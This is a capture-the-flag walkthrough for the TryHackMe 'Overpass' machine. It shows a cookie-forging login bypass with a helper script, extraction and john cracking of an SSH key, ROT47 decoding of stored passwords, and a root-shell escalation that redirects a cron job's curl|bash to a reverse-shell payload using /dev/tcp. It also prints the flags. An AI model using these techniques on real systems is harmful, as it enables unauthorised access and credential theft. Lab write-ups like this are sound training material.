OverPass
Target Details
IP: 10.10.60.248
Nmap Scan
Scan
nmap -sV -sC -Pn -oN scan.txt 10.10.60.248
Output
```
# Nmap 7.92 scan initiated Wed Jun 29 11:11:57 2022 as: nmap -sV -sC -Pn -oN scan.txt 10.10.60.248
Nmap scan report for 10.10.60.248
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 29 11:13:04 2022 -- 1 IP address (1 host up) scanned in 66.68 seconds
```
Two services are exposed: SSH on 22 and, on 80, a custom web application served by Go's net/http (the "Go-IPFS / InfluxDB" guess is just Nmap matching the generic Go server banner).
Find Directories using GoBuster
scan for directories
gobuster dir -u "http://10.10.60.248" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --no-error -o web-dirs.txt
useful link: /admin
Admin Page
visit Admin Page
View Source
The interesting finding is /login.js, which contains the client-side login logic:

```javascript
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = "";
    const creds = { username: usernameBox.value, password: passwordBox.value };
    const response = await postData("/api/login", creds);
    const statusOrCookie = await response.text();
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials";
        passwordBox.value = "";
    } else {
        Cookies.set("SessionToken", statusOrCookie);
        window.location = "/admin";
    }
}
```
The script treats any response body other than the literal string "Incorrect credentials" as a session token and stores it in a SessionToken cookie before redirecting to /admin. Nothing on the client validates the token, and as the next step shows, /admin only checks that a SessionToken cookie is present, not that its value corresponds to a real session. So we can bypass the login entirely by setting the cookie ourselves from the browser console (Ctrl+Shift+I -> Console tab) and reloading the page:

```javascript
Cookies.set("SessionToken", "random");
```
On reloading, the admin page shows a note from Paradox to James together with an encrypted private SSH key (id_rsa):

```
Since you keep forgetting your password, James, I've set up SSH keys for you.
If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we really need to talk about this "Military Grade" encryption.
- Paradox
```

```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337

LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
-----END RSA PRIVATE KEY-----
```
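The same bypass can be scripted instead of done in the browser console. The block below is an added example, not code from this writeup or from the Overpass project: it sends a request to /admin with a forged SessionToken cookie (mirroring what login.js does after any non-error response) and carves the PEM private key out of the returned HTML so it can be written straight to id_rsa. It assumes the server only checks that the cookie exists, which is what the console bypass above demonstrated; the target URL is a command-line argument, and the sample HTML embedded for offline use is constructed with a dummy key body.

```python
"""Forge the SessionToken cookie and extract the PEM key from /admin.

Added example; assumes /admin accepts any SessionToken value (as observed).
"""
import os
import re
import sys
import urllib.request
from typing import Dict, Optional

# Matches a traditional or OpenSSH PEM private key block, whatever the label.
PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+) PRIVATE KEY-----"
    r".*?"
    r"-----END (?P=label) PRIVATE KEY-----",
    re.DOTALL,
)


def forge_session(token: str = "random") -> Dict[str, str]:
    """Headers carrying the cookie login.js would have set for any
    response other than 'Incorrect credentials'."""
    return {"Cookie": f"SessionToken={token}"}


def fetch_admin(base_url: str, token: str = "random") -> str:
    """GET /admin with the forged cookie and return the page body."""
    req = urllib.request.Request(f"{base_url.rstrip('/')}/admin",
                                 headers=forge_session(token))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def extract_private_key(html: str) -> Optional[str]:
    """Return the first PEM private-key block in html, with HTML tags removed
    and one PEM line per row, ready to be saved as id_rsa.

    The blank line between the Proc-Type/DEK-Info headers and the base64
    body is part of the encrypted-PEM format and is preserved.
    """
    m = PEM_RE.search(html)
    if not m:
        return None
    body = re.sub(r"<[^>]+>", "", m.group(0))
    lines = [ln.strip() for ln in body.splitlines()]
    while lines and not lines[0]:
        lines.pop(0)
    while lines and not lines[-1]:
        lines.pop()
    return "\n".join(lines) + "\n"


# Constructed sample of an /admin response (the key body here is a dummy
# base64 string, not the real key shown above).
SAMPLE_ADMIN_HTML = """<html><body>
<p>Since you keep forgetting your password, James, ...</p>
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoxMjM0NTY3ODkwYWJjZGVmZ2hpamts
-----END RSA PRIVATE KEY-----</pre>
</body></html>"""


if __name__ == "__main__":
    # Usage: python3 grab_key.py http://10.10.60.248   (offline: no argument)
    html = fetch_admin(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ADMIN_HTML
    key = extract_private_key(html)
    if key is None:
        sys.exit("no private key block in response")
    with open("id_rsa", "w") as fh:
        fh.write(key)
    os.chmod("id_rsa", 0o600)  # ssh refuses keys readable by others
    print(key)
```

Run it against the live box with the base URL as the only argument; without an argument it parses the constructed sample so the extraction logic can be checked offline. The real fix for this class of bug is server-side: /admin must look the token up in a session store rather than accept any cookie value.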
Save the key to a file named id_rsa and make it readable and writable by the owner only (ssh refuses to use a key that other users can read):

```bash
chmod 600 ./id_rsa
```
Cracking id_rsa using John The Ripper
The key is passphrase-protected (Proc-Type: 4,ENCRYPTED), so convert it into a hash john understands. Copy the ssh2john.py script to the current directory:

```bash
cp /usr/share/john/ssh2john.py .
```

Use the script to produce a crackable hash for john:

```bash
python ssh2john.py id_rsa | tee ssh-hash.txt
```

Crack it with john (with no wordlist given, john falls back to its default modes; if that fails, add --wordlist=/usr/share/wordlists/rockyou.txt):

```bash
john ssh-hash.txt
```

Cracked passphrase:

```
james13
```
Accessing Target Machine via SSH
Since the note on the admin page was addressed to James, assume the username is james and log in with the recovered key, entering the cracked passphrase when prompted:

```bash
ssh -i ./id_rsa james@10.10.60.248
# Enter passphrase for key './id_rsa': james13
```

We get a shell:
```
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jun 29 06:39:02 UTC 2022

  System load:  0.23               Processes:           88
  Usage of /:   22.3% of 18.57GB   Users logged in:     0
  Memory usage: 16%                IP address for eth0: 10.10.60.248
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

47 packages can be updated.
0 updates are security updates.

Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$
```
Listing james's home directory reveals the first flag, user.txt.
Privilege Escalation
There is another file, todo.txt, in the home directory:

```
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating on the website
```

Two leads: james keeps his password in the Overpass password manager itself, so its data file is worth reading, and there is an automated build script somewhere that will matter later.
Download the Overpass source code from the target's HTTP server and read it. Two things stand out:

The stored credentials are not encrypted at all; they are obfuscated with ROT47, a fixed substitution over the 94 printable ASCII characters that anyone can reverse (this is the "Military Grade" encryption Paradox complained about).

The data file lives in the user's home directory as .overpass.

Reading ~/.overpass:

```bash
cat ~/.overpass
```

```
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.
```
Decode it with the ROT47 operation in CyberChef (or any ROT47 implementation; because 47 is half of 94, the same operation encodes and decodes). Decoded text:

```
[{"name":"System","pass":"saydrawnlyingpicture"}]
```

That is james's own password, which also makes sudo usable from this shell.
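The same decoding done offline, as an added example that is not part of this writeup or of the Overpass project. The ciphertext is the one read from ~/.overpass above; the JSON list of {"name","pass"} objects is the format the decoded output turns out to have, and the helper names are mine. It also shows the property that makes ROT47 useless as protection: applying it twice returns the input, so anyone who can read the file can read the passwords.

```python
"""ROT47 decoder for the Overpass password store (added example)."""
import json
import os
from typing import List, Optional

# Contents of ~/.overpass as shown above.
OVERPASS_CIPHERTEXT = ',LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.'


def rot47(text: str) -> str:
    """Rotate every printable ASCII character (0x21 '!' .. 0x7E '~') by 47
    positions inside that 94-character range; other characters (space,
    newlines, non-ASCII) pass through unchanged.  rot47(rot47(x)) == x."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            code = 33 + (code - 33 + 47) % 94
        out.append(chr(code))
    return "".join(out)


def load_overpass_store(blob: str) -> List[dict]:
    """Decode a ~/.overpass blob and parse the JSON list it hides."""
    return json.loads(rot47(blob))


def find_password(entries: List[dict], name: str) -> Optional[str]:
    """Look up the 'pass' field of the entry whose 'name' matches."""
    for entry in entries:
        if entry.get("name") == name:
            return entry.get("pass")
    return None


def decode_file(path: str = "~/.overpass") -> List[dict]:
    """Read and decode the store from disk (path is expanded for '~')."""
    with open(os.path.expanduser(path), encoding="ascii") as fh:
        return load_overpass_store(fh.read().strip())


if __name__ == "__main__":
    # Offline demo on the ciphertext from the page:
    for entry in load_overpass_store(OVERPASS_CIPHERTEXT):
        print(f"{entry['name']}: {entry['pass']}")
```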
Download and Upload Linpeas to Target machine
Attacker Machine
```bash
# Download linpeas
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220626/linpeas.sh

# Find your TryHackMe VPN address (the tunnel interface name may differ)
ifconfig tun0
#   ... inet [ATTACKER-THM-IP] ...   <- attacker's TryHackMe IP

# Serve the directory containing linpeas.sh over HTTP (port 8000 by default)
python3 -m http.server
```
Target Machine
```bash
# Fetch linpeas.sh from the attacker's HTTP server
wget http://[ATTACKER-THM-IP]:8000/linpeas.sh

# Run it
bash linpeas.sh
```
Linpeas juicy findings

```
# cron job (runs as root, every minute)
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

# /etc/hosts is writable
```

A root cron job runs every minute: it resolves overpass.thm, fetches /downloads/src/buildscript.sh over plain HTTP and pipes the response straight into bash. Because /etc/hosts is writable by our user, we control where overpass.thm resolves, and therefore what root executes.
Generating attack surface
Edit /etc/hosts on the target so that overpass.thm points at the attacker's IP.
On the attacker's machine, create a malicious bash script at the path downloads/src/buildscript.sh; the cron job will fetch and execute it as root within a minute.
Serve that directory with a Python HTTP server on port 80, since the cron job's curl uses plain http on the default port.
Catch the resulting shell and get root privileges.
Executing Attack
Target Machine
```bash
# Point overpass.thm at the attacker's IP, i.e. make the entry read
#   [ATTACKER_THM_IP] overpass.thm
nano /etc/hosts
```
Attacker's Machine
```bash
# Recreate the path the cron job requests
mkdir -p ./www/downloads/src/

# In a separate terminal, start a listener on port 9999
nc -nlvp 9999

# Write the reverse-shell payload that the cron job will pipe into bash
echo "bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_THM_IP]/9999 <&1'" > ./www/downloads/src/buildscript.sh

# Serve it on port 80 (the cron job's curl uses plain http on the default port)
cd www
sudo python3 -m http.server 80
```

> This can take up to a minute, because the job runs once per minute.
When the cron job next fires, the listener receives a root shell:

```bash
root@overpass-prod:~#
```
Get Root Flag
cat /root/root.txt
Output: thm{7f336f8c359dbac18d54fdd64ea753bb}
Answers
Q. Hack the machine and get the flag in user.txt
thm{65c1aaf000506e56996822c6281e6bf7}
Q. Escalate your privileges and get the flag in root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}